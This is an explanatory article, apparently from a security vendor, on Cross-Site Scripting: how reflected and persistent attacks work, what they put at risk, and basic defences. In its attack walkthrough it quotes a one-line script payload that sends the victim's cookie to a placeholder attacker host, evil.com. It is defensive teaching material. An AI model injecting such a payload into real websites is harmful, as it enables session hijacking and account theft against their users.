What is it?
Cross-Site Scripting (XSS) is a type of attack where a cyber-criminal injects malicious scripts (aka a malicious payload) into a legitimate website or web application.
Our Experts Explain
XSS vulnerabilities occur when a web application accepts user input, and dynamically includes that data in the web pages it generates without first validating the inputted data.
While quite a few coding languages have scripting vulnerabilities, such as VBScript, ActiveX and Flash, however, the largest number of XSS attacks target JavaScript – primarily because JavaScript is fundamental to most browsing experiences.
There is no need to target victims directly. An attacker simply exploits a vulnerability within a website or app that a victim visits, therefore using the website as a conduit to deliver a malicious payload to the victim’s browser.
Websites that require direct user input in its pages, are the most vulnerable, as attackers can simply replace the input text with malicious code.
As the page loads in the victim’s browser, the malicious script will execute, most often unbeknownst to the user.
Important Note — An XSS vulnerability can only exist if the payload (malicious script) that the attacker inserts ultimately get parsed (as HTML in this case) in the victim’s browser
Structure of a Cross-Site Scripting Attack
An XSS attack has three players — the website, the victim and the attacker.
In the example below (sourced from http://www.acunetix.com), it is assumed that the attacker’s goal is to impersonate the victim by stealing the victim’s cookie. By sending the cookie to a server the attacker can achieve control in a variety of ways, including executing the following JavaScript code in the victim’s browser via an XSS vulnerability.
<script>window.location=“http://evil.com/?cookie=” + document.cookie</script>
The figure below illustrates a step-by-step walkthrough of a simple XSS attack.
Figure 1: Sourced from http://www.acunetix.com
- The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript
- The victim requests the web page from the website
- The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.
- The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.
The victims of an XSS attack are the users of an application, not the application itself. XSS vulnerabilities are powerful, because the malicious code executes within the victim’s session, permitting the attacker to avoid normal security restrictions.
Examples of XSS Attacks
A ‘reflective XSS attack’ is where the attacker tempts a victim into unknowingly initiating the attack themselves. It could be as simple as sending the victim a hoax email with a link containing malicious JavaScript. If the link is clicked, the HTTP request is triggered from the victim’s browser and sent to the vulnerable web application. The malicious JavaScript is then sent back to the victim’s browser, and executed within their user session.
A ‘persistent XSS attack’, is where the attacker permanently sets up the malicious code within a web application and catches anyone who uses it. For instance, a web application might require a user to enter a username which is then displayed on each page of the user’s profile. To enable this, the application stores each username in a local database. If a cyber-criminal discovers that the web application does not validate the username field, they might include malicious JavaScript code as part of their username. When other application users unwittingly view the infected profile page, the malicious code automatically executes within their browser session.
What Are The Risks?
A successful XSS attack can provide the attacker with access to account credentials, spread web worms, access the user’s computer and view their browser history and even control the browser remotely. Once they have control of the victim’s system, attackers can also check other internet applications for vulnerabilities. By taking advantage of XSS vulnerabilities, an attacker can perform a range of malicious actions. For example, they could:
- Hijack an account.
- Spread web worms.
- Obtain a user’s session cookie and use it to impersonate that user.
- Access browser history and clipboard contents.
- Control the browser remotely.
- Scan and exploit intranet appliances and applications.
- Leverage HTML5 APIs to access a user’s geolocation, webcam, microphone and even the specific files from the user’s file system.
How Can You Protect Against XSS Attacks?
XSS vulnerabilities occur in the following situations when:
- Input coming into web applications is not validated
- Output to the browser is not HTML encoded
XSS vulnerabilities should not still exist, because they are easy to find and fix. Ensure that you have done your due diligence to protect your business from these avoidable attacks.